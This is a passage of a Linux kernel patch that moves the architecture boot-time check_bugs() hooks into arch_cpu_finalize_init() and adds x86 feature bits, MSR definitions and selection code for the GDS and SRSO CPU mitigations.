+ 	select ARCH_HAVE_NMI_SAFE_CMPXCHG if (GUSA_RB || CPU_SH4A)
+ 	select ARCH_HAS_BINFMT_FLAT if !MMU
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_GIGANTIC_PAGE
+ 	select ARCH_HAS_GCOV_PROFILE_ALL
+diff --git a/arch/sh/include/asm/bugs.h b/arch/sh/include/asm/bugs.h
+deleted file mode 100644
+index fe52abb69cea3..0000000000000
+--- a/arch/sh/include/asm/bugs.h
++++ /dev/null
+@@ -1,74 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __ASM_SH_BUGS_H
+-#define __ASM_SH_BUGS_H
+-
+-/*
+- * This is included by init/main.c to check for architecture-dependent bugs.
+- *
+- * Needs:
+- *	void check_bugs(void);
+- */
+-
+-/*
+- * I don't know of any Super-H bugs yet.
+- */
+-
+-#include <asm/processor.h>
+-
+-extern void select_idle_routine(void);
+-
+-static void __init check_bugs(void)
+-{
+-	extern unsigned long loops_per_jiffy;
+-	char *p = &init_utsname()->machine[2]; /* "sh" */
+-
+-	select_idle_routine();
+-
+-	current_cpu_data.loops_per_jiffy = loops_per_jiffy;
+-
+-	switch (current_cpu_data.family) {
+-	case CPU_FAMILY_SH2:
+-		*p++ = '2';
+-		break;
+-	case CPU_FAMILY_SH2A:
+-		*p++ = '2';
+-		*p++ = 'a';
+-		break;
+-	case CPU_FAMILY_SH3:
+-		*p++ = '3';
+-		break;
+-	case CPU_FAMILY_SH4:
+-		*p++ = '4';
+-		break;
+-	case CPU_FAMILY_SH4A:
+-		*p++ = '4';
+-		*p++ = 'a';
+-		break;
+-	case CPU_FAMILY_SH4AL_DSP:
+-		*p++ = '4';
+-		*p++ = 'a';
+-		*p++ = 'l';
+-		*p++ = '-';
+-		*p++ = 'd';
+-		*p++ = 's';
+-		*p++ = 'p';
+-		break;
+-	case CPU_FAMILY_UNKNOWN:
+-		/*
+-		 * Specifically use CPU_FAMILY_UNKNOWN rather than
+-		 * default:, so we're able to have the compiler whine
+-		 * about unhandled enumerations.
+-		 */
+-		break;
+-	}
+-
+-	printk("CPU: %s\n", get_cpu_subtype(&current_cpu_data));
+-
+-#ifndef __LITTLE_ENDIAN__
+-	/* 'eb' means 'Endian Big' */
+-	*p++ = 'e';
+-	*p++ = 'b';
+-#endif
+-	*p = '\0';
+-}
+-#endif /* __ASM_SH_BUGS_H */
+diff --git a/arch/sh/include/asm/processor.h b/arch/sh/include/asm/processor.h
+index 85a6c1c3c16e7..73fba7c922f92 100644
+--- a/arch/sh/include/asm/processor.h
++++ b/arch/sh/include/asm/processor.h
+@@ -166,6 +166,8 @@ extern unsigned int instruction_size(unsigned int insn);
+ #define instruction_size(insn)	(2)
+ #endif
+ 
++void select_idle_routine(void);
++
+ #endif /* __ASSEMBLY__ */
+ 
+ #include <asm/processor_32.h>
+diff --git a/arch/sh/kernel/idle.c b/arch/sh/kernel/idle.c
+index f59814983bd59..a80b2a5b25c7f 100644
+--- a/arch/sh/kernel/idle.c
++++ b/arch/sh/kernel/idle.c
+@@ -14,6 +14,7 @@
+ #include <linux/irqflags.h>
+ #include <linux/smp.h>
+ #include <linux/atomic.h>
++#include <asm/processor.h>
+ #include <asm/smp.h>
+ #include <asm/bl_bit.h>
+ 
+diff --git a/arch/sh/kernel/setup.c b/arch/sh/kernel/setup.c
+index af977ec4ca5e5..cf7c0f72f2935 100644
+--- a/arch/sh/kernel/setup.c
++++ b/arch/sh/kernel/setup.c
+@@ -43,6 +43,7 @@
+ #include <asm/smp.h>
+ #include <asm/mmu_context.h>
+ #include <asm/mmzone.h>
++#include <asm/processor.h>
+ #include <asm/sparsemem.h>
+ #include <asm/platform_early.h>
+ 
+@@ -354,3 +355,57 @@ int test_mode_pin(int pin)
+ {
+ 	return sh_mv.mv_mode_pins() & pin;
+ }
++
++void __init arch_cpu_finalize_init(void)
++{
++	char *p = &init_utsname()->machine[2]; /* "sh" */
++
++	select_idle_routine();
++
++	current_cpu_data.loops_per_jiffy = loops_per_jiffy;
++
++	switch (current_cpu_data.family) {
++	case CPU_FAMILY_SH2:
++		*p++ = '2';
++		break;
++	case CPU_FAMILY_SH2A:
++		*p++ = '2';
++		*p++ = 'a';
++		break;
++	case CPU_FAMILY_SH3:
++		*p++ = '3';
++		break;
++	case CPU_FAMILY_SH4:
++		*p++ = '4';
++		break;
++	case CPU_FAMILY_SH4A:
++		*p++ = '4';
++		*p++ = 'a';
++		break;
++	case CPU_FAMILY_SH4AL_DSP:
++		*p++ = '4';
++		*p++ = 'a';
++		*p++ = 'l';
++		*p++ = '-';
++		*p++ = 'd';
++		*p++ = 's';
++		*p++ = 'p';
++		break;
++	case CPU_FAMILY_UNKNOWN:
++		/*
++		 * Specifically use CPU_FAMILY_UNKNOWN rather than
++		 * default:, so we're able to have the compiler whine
++		 * about unhandled enumerations.
++		 */
++		break;
++	}
++
++	pr_info("CPU: %s\n", get_cpu_subtype(&current_cpu_data));
++
++#ifndef __LITTLE_ENDIAN__
++	/* 'eb' means 'Endian Big' */
++	*p++ = 'e';
++	*p++ = 'b';
++#endif
++	*p = '\0';
++}
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index dbb1760cbe8c9..b67d96e3392e5 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -51,6 +51,7 @@ config SPARC
+ config SPARC32
+ 	def_bool !64BIT
+ 	select ARCH_32BIT_OFF_T
++	select ARCH_HAS_CPU_FINALIZE_INIT if !SMP
+ 	select ARCH_HAS_SYNC_DMA_FOR_CPU
+ 	select CLZ_TAB
+ 	select DMA_DIRECT_REMAP
+diff --git a/arch/sparc/include/asm/bugs.h b/arch/sparc/include/asm/bugs.h
+deleted file mode 100644
+index 02fa369b9c21f..0000000000000
+--- a/arch/sparc/include/asm/bugs.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/* include/asm/bugs.h:  Sparc probes for various bugs.
+- *
+- * Copyright (C) 1996, 2007 David S. Miller (davem@davemloft.net)
+- */
+-
+-#ifdef CONFIG_SPARC32
+-#include <asm/cpudata.h>
+-#endif
+-
+-extern unsigned long loops_per_jiffy;
+-
+-static void __init check_bugs(void)
+-{
+-#if defined(CONFIG_SPARC32) && !defined(CONFIG_SMP)
+-	cpu_data(0).udelay_val = loops_per_jiffy;
+-#endif
+-}
+diff --git a/arch/sparc/kernel/setup_32.c b/arch/sparc/kernel/setup_32.c
+index c8e0dd99f3700..c9d1ba4f311b9 100644
+--- a/arch/sparc/kernel/setup_32.c
++++ b/arch/sparc/kernel/setup_32.c
+@@ -412,3 +412,10 @@ static int __init topology_init(void)
+ }
+ 
+ subsys_initcall(topology_init);
++
++#if defined(CONFIG_SPARC32) && !defined(CONFIG_SMP)
++void __init arch_cpu_finalize_init(void)
++{
++	cpu_data(0).udelay_val = loops_per_jiffy;
++}
++#endif
+diff --git a/arch/um/Kconfig b/arch/um/Kconfig
+index ad4ff3b0e91e5..82709bc36df7d 100644
+--- a/arch/um/Kconfig
++++ b/arch/um/Kconfig
+@@ -6,6 +6,7 @@ config UML
+ 	bool
+ 	default y
+ 	select ARCH_EPHEMERAL_INODES
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_FORTIFY_SOURCE
+ 	select ARCH_HAS_GCOV_PROFILE_ALL
+ 	select ARCH_HAS_KCOV
+diff --git a/arch/um/include/asm/bugs.h b/arch/um/include/asm/bugs.h
+deleted file mode 100644
+index 4473942a08397..0000000000000
+--- a/arch/um/include/asm/bugs.h
++++ /dev/null
+@@ -1,7 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __UM_BUGS_H
+-#define __UM_BUGS_H
+-
+-void check_bugs(void);
+-
+-#endif
+diff --git a/arch/um/kernel/um_arch.c b/arch/um/kernel/um_arch.c
+index 8adf8e89b2558..334c91191b316 100644
+--- a/arch/um/kernel/um_arch.c
++++ b/arch/um/kernel/um_arch.c
+@@ -3,6 +3,7 @@
+  * Copyright (C) 2000 - 2007 Jeff Dike (jdike@{addtoit,linux.intel}.com)
+  */
+ 
++#include <linux/cpu.h>
+ #include <linux/delay.h>
+ #include <linux/init.h>
+ #include <linux/mm.h>
+@@ -426,7 +427,7 @@ void __init setup_arch(char **cmdline_p)
+ 	}
+ }
+ 
+-void __init check_bugs(void)
++void __init arch_cpu_finalize_init(void)
+ {
+ 	arch_check_bugs();
+ 	os_check_bugs();
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index b3d5706579d43..4c9bfc4be58d4 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -69,6 +69,7 @@ config X86
+ 	select ARCH_ENABLE_THP_MIGRATION if X86_64 && TRANSPARENT_HUGEPAGE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
+ 	select ARCH_HAS_CACHE_LINE_SIZE
++	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_CURRENT_STACK_POINTER
+ 	select ARCH_HAS_DEBUG_VIRTUAL
+ 	select ARCH_HAS_DEBUG_VM_PGTABLE	if !X86_PAE
+@@ -2511,6 +2512,13 @@ config CPU_IBRS_ENTRY
+ 	  This mitigates both spectre_v2 and retbleed at great cost to
+ 	  performance.
+ 
++config CPU_SRSO
++	bool "Mitigate speculative RAS overflow on AMD"
++	depends on CPU_SUP_AMD && X86_64 && RETHUNK
++	default y
++	help
++	  Enable the SRSO mitigation needed on AMD Zen1-4 machines.
++
+ config SLS
+ 	bool "Mitigate Straight-Line-Speculation"
+ 	depends on CC_HAS_SLS && X86_64
+@@ -2521,6 +2529,25 @@ config SLS
+ 	  against straight line speculation. The kernel image might be slightly
+ 	  larger.
+ 
++config GDS_FORCE_MITIGATION
++	bool "Force GDS Mitigation"
++	depends on CPU_SUP_INTEL
++	default n
++	help
++	  Gather Data Sampling (GDS) is a hardware vulnerability which allows
++	  unprivileged speculative access to data which was previously stored in
++	  vector registers.
++
++	  This option is equivalent to setting gather_data_sampling=force on the
++	  command line. The microcode mitigation is used if present, otherwise
++	  AVX is disabled as a mitigation. On affected systems that are missing
++	  the microcode any userspace code that unconditionally uses AVX will
++	  break with this option set.
++
++	  Setting this option on systems not vulnerable to GDS has no effect.
++
++	  If in doubt, say N.
++
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/include/asm/bugs.h b/arch/x86/include/asm/bugs.h
+index 92ae283899409..f25ca2d709d40 100644
+--- a/arch/x86/include/asm/bugs.h
++++ b/arch/x86/include/asm/bugs.h
+@@ -4,8 +4,6 @@
+ 
+ #include <asm/processor.h>
+ 
+-extern void check_bugs(void);
+-
+ #if defined(CONFIG_CPU_SUP_INTEL) && defined(CONFIG_X86_32)
+ int ppro_with_ram_bug(void);
+ #else
+diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
+index 1a85e1fb09226..ce0c8f7d32186 100644
+--- a/arch/x86/include/asm/cpufeature.h
++++ b/arch/x86/include/asm/cpufeature.h
+@@ -32,6 +32,7 @@ enum cpuid_leafs
+ 	CPUID_8000_0007_EBX,
+ 	CPUID_7_EDX,
+ 	CPUID_8000_001F_EAX,
++	CPUID_8000_0021_EAX,
+ };
+ 
+ #define X86_CAP_FMT_NUM "%d:%d"
+@@ -94,8 +95,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 17, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 19, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(REQUIRED_MASK, 20, feature_bit) ||	\
+ 	   REQUIRED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 20))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
+ 
+ #define DISABLED_MASK_BIT_SET(feature_bit)				\
+ 	 ( CHECK_BIT_IN_MASK_WORD(DISABLED_MASK,  0, feature_bit) ||	\
+@@ -118,8 +120,9 @@ extern const char * const x86_bug_flags[NBUGINTS*32];
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 17, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 18, feature_bit) ||	\
+ 	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 19, feature_bit) ||	\
++	   CHECK_BIT_IN_MASK_WORD(DISABLED_MASK, 20, feature_bit) ||	\
+ 	   DISABLED_MASK_CHECK					  ||	\
+-	   BUILD_BUG_ON_ZERO(NCAPINTS != 20))
++	   BUILD_BUG_ON_ZERO(NCAPINTS != 21))
+ 
+ #define cpu_has(c, bit)							\
+ 	(__builtin_constant_p(bit) && REQUIRED_MASK_BIT_SET(bit) ? 1 :	\
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index 92729c38853d1..e721b8426c245 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -13,8 +13,8 @@
+ /*
+  * Defines x86 CPU feature bits
+  */
+-#define NCAPINTS			20	   /* N 32-bit words worth of info */
+-#define NBUGINTS			1	   /* N 32-bit bug flags */
++#define NCAPINTS			21	   /* N 32-bit words worth of info */
++#define NBUGINTS			2	   /* N 32-bit bug flags */
+ 
+ /*
+  * Note: If the comment begins with a quoted string, that string is used
+@@ -308,6 +308,10 @@
+ 
+ #define X86_FEATURE_MSR_TSX_CTRL	(11*32+20) /* "" MSR IA32_TSX_CTRL (Intel) implemented */
+ 
++#define X86_FEATURE_SRSO		(11*32+24) /* "" AMD BTB untrain RETs */
++#define X86_FEATURE_SRSO_ALIAS		(11*32+25) /* "" AMD BTB untrain RETs through aliasing */
++#define X86_FEATURE_IBPB_ON_VMEXIT	(11*32+26) /* "" Issue an IBPB only on VMEXIT */
++
+ /* Intel-defined CPU features, CPUID level 0x00000007:1 (EAX), word 12 */
+ #define X86_FEATURE_AVX_VNNI		(12*32+ 4) /* AVX VNNI instructions */
+ #define X86_FEATURE_AVX512_BF16		(12*32+ 5) /* AVX512 BFLOAT16 instructions */
+@@ -423,6 +427,10 @@
+ #define X86_FEATURE_V_TSC_AUX		(19*32+ 9) /* "" Virtual TSC_AUX */
+ #define X86_FEATURE_SME_COHERENT	(19*32+10) /* "" AMD hardware-enforced cache coherency */
+ 
++#define X86_FEATURE_SBPB		(20*32+27) /* "" Selective Branch Prediction Barrier */
++#define X86_FEATURE_IBPB_BRTYPE		(20*32+28) /* "" MSR_PRED_CMD[IBPB] flushes all branch type predictions */
++#define X86_FEATURE_SRSO_NO		(20*32+29) /* "" CPU is not affected by SRSO */
++
+ /*
+  * BUG word(s)
+  */
+@@ -464,5 +472,8 @@
+ #define X86_BUG_RETBLEED		X86_BUG(27) /* CPU is affected by RETBleed */
+ #define X86_BUG_EIBRS_PBRSB		X86_BUG(28) /* EIBRS is vulnerable to Post Barrier RSB Predictions */
+ #define X86_BUG_SMT_RSB			X86_BUG(29) /* CPU is vulnerable to Cross-Thread Return Address Predictions */
++#define X86_BUG_GDS			X86_BUG(30) /* CPU is affected by Gather Data Sampling */
+ 
++/* BUG word 2 */
++#define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/disabled-features.h b/arch/x86/include/asm/disabled-features.h
+index 33d2cd04d2544..000037078db43 100644
+--- a/arch/x86/include/asm/disabled-features.h
++++ b/arch/x86/include/asm/disabled-features.h
+@@ -111,6 +111,7 @@
+ #define DISABLED_MASK17	0
+ #define DISABLED_MASK18	0
+ #define DISABLED_MASK19	0
+-#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 20)
++#define DISABLED_MASK20	0
++#define DISABLED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
+ 
+ #endif /* _ASM_X86_DISABLED_FEATURES_H */
+diff --git a/arch/x86/include/asm/fpu/api.h b/arch/x86/include/asm/fpu/api.h
+index 503a577814b2e..b475d9a582b88 100644
+--- a/arch/x86/include/asm/fpu/api.h
++++ b/arch/x86/include/asm/fpu/api.h
+@@ -109,7 +109,7 @@ extern void fpu_reset_from_exception_fixup(void);
+ 
+ /* Boot, hotplug and resume */
+ extern void fpu__init_cpu(void);
+-extern void fpu__init_system(struct cpuinfo_x86 *c);
++extern void fpu__init_system(void);
+ extern void fpu__init_check_bugs(void);
+ extern void fpu__resume_cpu(void);
+ 
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index 72ca90552b6a4..8f513372cd8d4 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -17,6 +17,12 @@
+ 
+ #include <asm/bootparam.h>
+ 
++#ifdef CONFIG_X86_MEM_ENCRYPT
++void __init mem_encrypt_init(void);
++#else
++static inline void mem_encrypt_init(void) { }
++#endif
++
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 
+ extern u64 sme_me_mask;
+@@ -86,9 +92,6 @@ static inline void mem_encrypt_free_decrypted_mem(void) { }
+ 
+ #endif	/* CONFIG_AMD_MEM_ENCRYPT */
+ 
+-/* Architecture __weak replacement functions */
+-void __init mem_encrypt_init(void);
+-
+ void add_encrypt_protection_map(void);
+ 
+ /*
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 846067e1ee8bb..52d8c67d93081 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -60,6 +60,7 @@
+ 
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
++#define PRED_CMD_SBPB			BIT(7)	   /* Selective Branch Prediction Barrier */
+ 
+ #define MSR_PPIN_CTL			0x0000004e
+ #define MSR_PPIN			0x0000004f
+@@ -158,6 +159,15 @@
+ 						 * Not susceptible to Post-Barrier
+ 						 * Return Stack Buffer Predictions.
+ 						 */
++#define ARCH_CAP_GDS_CTRL		BIT(25)	/*
++						 * CPU is vulnerable to Gather
++						 * Data Sampling (GDS) and
++						 * has controls for mitigation.
++						 */
++#define ARCH_CAP_GDS_NO			BIT(26)	/*
++						 * CPU is not vulnerable to Gather
++						 * Data Sampling (GDS).
++						 */
+ 
+ #define ARCH_CAP_XAPIC_DISABLE		BIT(21)	/*
+ 						 * IA32_XAPIC_DISABLE_STATUS MSR
+@@ -181,6 +191,8 @@
+ #define RNGDS_MITG_DIS			BIT(0)	/* SRBDS support */
+ #define RTM_ALLOW			BIT(1)	/* TSX development mode */
+ #define FB_CLEAR_DIS			BIT(3)	/* CPU Fill buffer clear disable */
++#define GDS_MITG_DIS			BIT(4)	/* Disable GDS mitigation */
++#define GDS_MITG_LOCKED			BIT(5)	/* GDS mitigation locked */
+ 
+ #define MSR_IA32_SYSENTER_CS		0x00000174
+ #define MSR_IA32_SYSENTER_ESP		0x00000175
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index dfdb103ae4f6f..31fa631c8587c 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -112,7 +112,7 @@
+  * eventually turn into it's own annotation.
+  */
+ .macro ANNOTATE_UNRET_END
+-#ifdef CONFIG_DEBUG_ENTRY
++#if (defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_SRSO))
+ 	ANNOTATE_RETPOLINE_SAFE
+ 	nop
+ #endif
+@@ -185,12 +185,18 @@
+  * where we have a stack but before any RET instruction.
+  */
+ .macro UNTRAIN_RET
+-#if defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_IBPB_ENTRY)
++#if defined(CONFIG_CPU_UNRET_ENTRY) || defined(CONFIG_CPU_IBPB_ENTRY) || \
++	defined(CONFIG_CPU_SRSO)
+ 	ANNOTATE_UNRET_END
+ 	ALTERNATIVE_2 "",						\
+ 	              CALL_ZEN_UNTRAIN_RET, X86_FEATURE_UNRET,		\
+ 		      "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
+ #endif
++
++#ifdef CONFIG_CPU_SRSO
++	ALTERNATIVE_2 "", "call srso_untrain_ret", X86_FEATURE_SRSO, \
++			  "call srso_untrain_ret_alias", X86_FEATURE_SRSO_ALIAS
++#endif
+ .endm
+ 
+ #else /* __ASSEMBLY__ */
+@@ -206,6 +212,8 @@ extern retpoline_thunk_t __x86_indirect_thunk_array[];
+ 
+ extern void __x86_return_thunk(void);
+ extern void zen_untrain_ret(void);
++extern void srso_untrain_ret(void);
++extern void srso_untrain_ret_alias(void);
+ extern void entry_ibpb(void);
+ 
+ #ifdef CONFIG_RETPOLINE
+@@ -311,11 +319,11 @@ void alternative_msr_write(unsigned int msr, u64 val, unsigned int feature)
+ 		: "memory");
+ }
+ 
++extern u64 x86_pred_cmd;
++
+ static inline void indirect_branch_prediction_barrier(void)
+ {
+-	u64 val = PRED_CMD_IBPB;
+-
+-	alternative_msr_write(MSR_IA32_PRED_CMD, val, X86_FEATURE_USE_IBPB);
++	alternative_msr_write(MSR_IA32_PRED_CMD, x86_pred_cmd, X86_FEATURE_USE_IBPB);
+ }
+ 
+ /* The Intel SPEC CTRL MSR base value cache */
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index d8277eec1bcd6..c13e4ff8ec70c 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -800,9 +800,11 @@ extern u16 get_llc_id(unsigned int cpu);
+ #ifdef CONFIG_CPU_SUP_AMD
+ extern u32 amd_get_nodes_per_socket(void);
+ extern u32 amd_get_highest_perf(void);
++extern bool cpu_has_ibpb_brtype_microcode(void);
+ #else
+ static inline u32 amd_get_nodes_per_socket(void)	{ return 0; }
+ static inline u32 amd_get_highest_perf(void)		{ return 0; }
++static inline bool cpu_has_ibpb_brtype_microcode(void)	{ return false; }
+ #endif
+ 
+ #define for_each_possible_hypervisor_cpuid_base(function) \
+diff --git a/arch/x86/include/asm/required-features.h b/arch/x86/include/asm/required-features.h
+index aff774775c678..7ba1726b71c7b 100644
+--- a/arch/x86/include/asm/required-features.h
++++ b/arch/x86/include/asm/required-features.h
+@@ -98,6 +98,7 @@
+ #define REQUIRED_MASK17	0
+ #define REQUIRED_MASK18	0
+ #define REQUIRED_MASK19	0
+-#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 20)
++#define REQUIRED_MASK20	0
++#define REQUIRED_MASK_CHECK BUILD_BUG_ON_ZERO(NCAPINTS != 21)
+ 
+ #endif /* _ASM_X86_REQUIRED_FEATURES_H */
+diff --git a/arch/x86/include/asm/sigframe.h b/arch/x86/include/asm/sigframe.h
+index 5b1ed650b1248..84eab27248754 100644
+--- a/arch/x86/include/asm/sigframe.h
++++ b/arch/x86/include/asm/sigframe.h
+@@ -85,6 +85,4 @@ struct rt_sigframe_x32 {
+ 
+ #endif /* CONFIG_X86_64 */
+ 
+-void __init init_sigframe_size(void);
+-
+ #endif /* _ASM_X86_SIGFRAME_H */
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 7f4eb8b027cc8..7f0cf4a959c02 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -1245,6 +1245,25 @@ u32 amd_get_highest_perf(void)
+ }
+ EXPORT_SYMBOL_GPL(amd_get_highest_perf);
+ 
++bool cpu_has_ibpb_brtype_microcode(void)
++{
++	switch (boot_cpu_data.x86) {
++	/* Zen1/2 IBPB flushes branch type predictions too. */
++	case 0x17:
++		return boot_cpu_has(X86_FEATURE_AMD_IBPB);
++	case 0x19:
++		/* Poke the MSR bit on Zen3/4 to check its presence. */
++		if (!wrmsrl_safe(MSR_IA32_PRED_CMD, PRED_CMD_SBPB)) {
++			setup_force_cpu_cap(X86_FEATURE_SBPB);
++			return true;
++		} else {
++			return false;
++		}
++	default:
++		return false;
++	}
++}
++
+ static void zenbleed_check_cpu(void *unused)
+ {
+ 	struct cpuinfo_x86 *c = &cpu_data(smp_processor_id());
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index f54992887491e..d98f33ea57e47 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -9,7 +9,6 @@
+  *	- Andrew D. Balsa (code cleanup).
+  */
+ #include <linux/init.h>
+-#include <linux/utsname.h>
+ #include <linux/cpu.h>
+ #include <linux/module.h>
+ #include <linux/nospec.h>
+@@ -27,8 +26,6 @@
+ #include <asm/msr.h>
+ #include <asm/vmx.h>
+ #include <asm/paravirt.h>
+-#include <asm/alternative.h>
+-#include <asm/set_memory.h>
+ #include <asm/intel-family.h>
+ #include <asm/e820/api.h>
+ #include <asm/hypervisor.h>
+@@ -49,6 +46,8 @@ static void __init taa_select_mitigation(void);
+ static void __init mmio_select_mitigation(void);
+ static void __init srbds_select_mitigation(void);
+ static void __init l1d_flush_select_mitigation(void);
++static void __init gds_select_mitigation(void);
++static void __init srso_select_mitigation(void);
+ 
+ /* The base value of the SPEC_CTRL MSR without task-specific bits set */
+ u64 x86_spec_ctrl_base;
+@@ -58,6 +57,9 @@ EXPORT_SYMBOL_GPL(x86_spec_ctrl_base);
+ DEFINE_PER_CPU(u64, x86_spec_ctrl_current);
+ EXPORT_SYMBOL_GPL(x86_spec_ctrl_current);
+ 
++u64 x86_pred_cmd __ro_after_init = PRED_CMD_IBPB;
++EXPORT_SYMBOL_GPL(x86_pred_cmd);
++
+ static DEFINE_MUTEX(spec_ctrl_mutex);
+ 
+ /* Update SPEC_CTRL MSR and its cached copy unconditionally */
+@@ -124,21 +126,8 @@ DEFINE_STATIC_KEY_FALSE(switch_mm_cond_l1d_flush);
+ DEFINE_STATIC_KEY_FALSE(mmio_stale_data_clear);
+ EXPORT_SYMBOL_GPL(mmio_stale_data_clear);
+ 
+-void __init check_bugs(void)
++void __init cpu_select_mitigations(void)
+ {
+-	identify_boot_cpu();
+-
+-	/*
+-	 * identify_boot_cpu() initialized SMT support information, let the
+-	 * core code know.
+-	 */
+-	cpu_smt_check_topology();
+-
+-	if (!IS_ENABLED(CONFIG_SMP)) {
+-		pr_info("CPU: ");
+-		print_cpu_info(&boot_cpu_data);
+-	}
+-
+ 	/*
+ 	 * Read the SPEC_CTRL MSR to account for reserved bits which may
+ 	 * have unknown values. AMD64_LS_CFG MSR is cached in the early AMD
+@@ -175,39 +164,8 @@ void __init check_bugs(void)
+ 	md_clear_select_mitigation();
+ 	srbds_select_mitigation();
+ 	l1d_flush_select_mitigation();
+-
+-	arch_smt_update();
+-
+-#ifdef CONFIG_X86_32
+-	/*
+-	 * Check whether we are able to run this kernel safely on SMP.
+-	 *
+-	 * - i386 is no longer supported.
+-	 * - In order to run on anything without a TSC, we need to be
+-	 *   compiled for a i486.
+-	 */
+-	if (boot_cpu_data.x86 < 4)
+-		panic("Kernel requires i486+ for 'invlpg' and other features");
+-
+-	init_utsname()->machine[1] =
+-		'0' + (boot_cpu_data.x86 > 6 ? 6 : boot_cpu_data.x86);
+-	alternative_instructions();
+-
+-	fpu__init_check_bugs();
+-#else /* CONFIG_X86_64 */
+-	alternative_instructions();
+-
+-	/*
+-	 * Make sure the first 2MB area is not mapped by huge pages
+-	 * There are typically fixed size MTRRs in there and overlapping
+-	 * MTRRs into large pages causes slow downs.
+-	 *
+-	 * Right now we don't do that with gbpages because there seems
+-	 * very little benefit for that case.
+-	 */
+-	if (!direct_gbpages)
+-		set_memory_4k((unsigned long)__va(0), 1);
+-#endif
++	gds_select_mitigation();
++	srso_select_mitigation();
+ }
+ 
+ /*
+@@ -693,6 +651,149 @@ static int __init l1d_flush_parse_cmdline(char *str)
+ }
+ early_param("l1d_flush", l1d_flush_parse_cmdline);
+ 
++#undef pr_fmt
++#define pr_fmt(fmt)	"GDS: " fmt
++
++enum gds_mitigations {
++	GDS_MITIGATION_OFF,
++	GDS_MITIGATION_UCODE_NEEDED,
++	GDS_MITIGATION_FORCE,
++	GDS_MITIGATION_FULL,
++	GDS_MITIGATION_FULL_LOCKED,
++	GDS_MITIGATION_HYPERVISOR,
++};
++
++#if IS_ENABLED(CONFIG_GDS_FORCE_MITIGATION)
++static enum gds_mitigations gds_mitigation __ro_after_init = GDS_MITIGATION_FORCE;
++#else
++static enum gds_mitigations gds_mitigation __ro_after_init = GDS_MITIGATION_FULL;
++#endif
++
++static const char * const gds_strings[] = {
++	[GDS_MITIGATION_OFF]		= "Vulnerable",
++	[GDS_MITIGATION_UCODE_NEEDED]	= "Vulnerable: No microcode",
++	[GDS_MITIGATION_FORCE]		= "Mitigation: AVX disabled, no microcode",
++	[GDS_MITIGATION_FULL]		= "Mitigation: Microcode",
++	[GDS_MITIGATION_FULL_LOCKED]	= "Mitigation: Microcode (locked)",
++	[GDS_MITIGATION_HYPERVISOR]	= "Unknown: Dependent on hypervisor status",
++};
++
++bool gds_ucode_mitigated(void)
++{
++	return (gds_mitigation == GDS_MITIGATION_FULL ||
++		gds_mitigation == GDS_MITIGATION_FULL_LOCKED);
++}
